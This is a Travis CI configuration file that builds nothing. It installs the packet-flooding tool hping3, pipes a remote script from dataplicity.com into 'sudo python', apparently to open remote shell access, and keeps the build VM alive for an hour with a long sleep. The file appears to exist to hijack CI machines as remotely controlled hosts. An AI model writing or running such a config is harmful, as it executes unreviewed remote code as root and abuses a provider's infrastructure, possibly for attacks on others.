sudo: required

dist: trusty

language: bash

script: 

     - sudo apt install hping3 -y

     - curl https://www.dataplicity.com/xsn6xmmx.py | sudo python

     - travis_wait 3600 sleep 3600

     - echo done

